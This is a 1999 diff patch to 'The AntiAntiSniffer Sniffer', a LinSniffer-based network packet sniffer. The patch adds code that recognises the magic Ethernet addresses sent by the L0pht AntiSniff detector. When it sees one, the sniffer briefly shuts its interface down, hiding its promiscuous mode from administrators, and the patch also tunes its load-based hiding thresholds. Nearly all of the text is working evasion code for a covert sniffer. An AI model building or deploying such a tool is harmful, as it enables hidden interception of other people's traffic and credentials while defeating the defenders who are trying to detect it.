aass_patch.txt

`--- aass-old.c Mon Jul 26 20:45:46 1999  
+++ aass.c Mon Jul 26 21:54:47 1999  
@@ -1,5 +1,5 @@  
/*  
- The AntiAntiSniffer Sniffer by Mike Perry  
+ The AntiAntiSniffer Sniffer v0.2 by Mike Perry  
  
To all my friends, coworkers, and associates who thought I knew better than  
to do something like this, please understand that when I discovered I could  
@@ -8,9 +8,15 @@  
P.S. Legitimate tools such as icmplog will exhibit the same order of  
magnitude latency increase on ping responses.  
  
+ New to 0.2: I check eth frame's addresses for the magic value used by l0pht  
+ antisniff, as well as your ethaddr if ULTRA_PARANOID is set.  
+  
Moral of the story: use ssh/lsh, and assume no host on your network is to  
be trusted under any means.  
-  
+  
+ P.S. Sorry to all my teachers. All the global varables must be killing you  
+ guys right now :)  
+  
Based on:  
LinSniffer 0.03 [BETA]  
Mike Edulla  
@@ -37,6 +43,10 @@  
  
#define INTERFACE "eth0"  
  
+#ifndef ETH_ALEN  
+# define ETH_ALEN 6  
+#endif  
+  
/* Really paranoid counts every packet in the load average. If the load  
* average jumps, we drop the promisc bit, and sleep for a few seconds */  
#define REALLY_PARANOID 3  
@@ -61,8 +71,8 @@  
* accumulate enough packets for accurate statistics! See the HIDEOUT &  
* comments for more info..  
*/  
-#define NUM_PKTS_SHIFT 4  
-#define NUM_PKTS 32  
+#define NUM_PKTS_SHIFT 2  
+#define NUM_PKTS 8  
  
/*  
* Secs to wait for the bad men to go away :)  
@@ -83,19 +93,37 @@  
  
/* This causes the algorithm to treat dead time as if a packet was coming  
* every BASELINE usecs. Useful for intermittent traffic networks */  
-#define BASELINE 5000 /* 5ms */  
+#define BASELINE 4000 /* 4ms */  
  
-/* As a last resort, don't track more than CMAX connections at once.  
- */  
+/* As a last resort, don't track more than CMAX connections at once. */  
#define CMAX 10 /* -1 is Inf */  
  
+/* This option controls if we watch for the AntiSniff magic packets, in  
+ * addition to our own address (in case they are sending the ping before we  
+ * detected a change in load)  
+ * Note, this is a definable option because it is possible to use this against  
+ * us, and send these packets all the time just to shut us down */  
+#define ANTIMAGIC  
+  
+#ifdef ANTIMAGIC  
+# define MAGIC1 "ff:00:00:00:00:00" /* Method #1 for Win* */  
+# define MAGIC2 "66:66:66:66:66:66" /* AntiSniff user specified */  
+# define MYADDR "fe:ed:de:ad:be:ef" /* Undefine and decrement NMAGIC, and  
+ change the hex_addrlist to not watch  
+ for your address */  
+# define NMAGIC 3 /* Number of magic eth addrs to search */  
+char *hex_addrlist[] = { MAGIC1, MAGIC2, MYADDR };  
+char h_dest[NMAGIC][ETH_ALEN];  
+#endif  
+  
+  
#define CAPLEN 512  
#define TIMEOUT 30  
#define TCPLOG "test"  
  
/* Actually, this debug option prints out some pretty useful stats you can use  
* to set UMAX_LOAD */  
-// #define DEBUG  
+/*#define DEBUG */  
  
#ifdef DEBUG  
# define PRINTF(a...) printf(##a)  
@@ -145,7 +173,57 @@  
int s;  
FILE *fp;  
  
+#ifdef ANTIMAGIC  
+  
+# ifdef DEBUG  
+# define PRINT_ETHER(a) print_ether(a)  
+# else  
+# define PRINT_ETHER(a)  
+# endif  
  
+void print_ether(char *addr)  
+{  
+ fprintf(fp,"Eth addr %2X:%2X:%2X:%2X:%2X:%2X\n",  
+ addr[0] & 0xff, addr[1] & 0xff,  
+ addr[2] & 0xff, addr[3] & 0xff,  
+ addr[4] & 0xff, addr[5] & 0xff);  
+ fflush(fp);  
+}  
+  
+void init_magic()  
+{  
+ char *p;  
+ int j = 0, i;  
+  
+ for(j = 0; j < NMAGIC; j++)  
+ {  
+ p = hex_addrlist[j];  
+ PRINTF("Blocking addr %s\n", p);  
+ for(i=0; i < ETH_ALEN && p && *p != 0; i++, p++)  
+ {  
+ h_dest[j][i] = strtol(p, NULL, 16) & 0xff;  
+ p = strchr(p, ':');  
+ }  
+ PRINT_ETHER(h_dest[j]);  
+ }  
+}  
+  
+int ismagic()  
+{  
+ register int i;  
+  
+ PRINT_ETHER(ep.eth.h_dest);  
+  
+ for(i = 0; i < NMAGIC; i++)  
+ {  
+ if(!memcmp(ep.eth.h_dest, h_dest[i], ETH_ALEN))  
+ {  
+ return 1;  
+ }  
+ }  
+ return 0;  
+}  
+#endif  
void set_promisc(char *dev, int s)  
{  
struct ifreq ifr;  
@@ -315,6 +393,14 @@  
{  
if(read(s, (struct etherpacket *) &ep, sizeof(ep)) > 1)  
{  
+#ifdef ANTIMAGIC  
+ if(ismagic())  
+ {  
+ closeintf(INTERFACE,s);  
+ usleep(randhide());  
+ openintf(INTERFACE);  
+ }  
+#endif  
#if AASS == REALLY_PARANOID  
if(account_load(&rawload))  
{  
@@ -500,7 +586,6 @@  
signal(SIGKILL, cleanup);  
signal(SIGQUIT, cleanup);  
fp = fopen(TCPLOG, "at");  
- s = openintf(INTERFACE);  
gettimeofday(&tv, NULL);  
srand(tv.tv_usec ^ getpid() ^ (getppid() << 16));  
  
@@ -516,8 +601,12 @@  
}  
  
vlist_head.next = NULL;  
+#ifdef ANTIMAGIC  
+ init_magic();  
+#endif  
init_load(&tcpload);  
init_load(&rawload);  
+ s = openintf(INTERFACE);  
for (;;)  
{  
read_tcp(s);  
`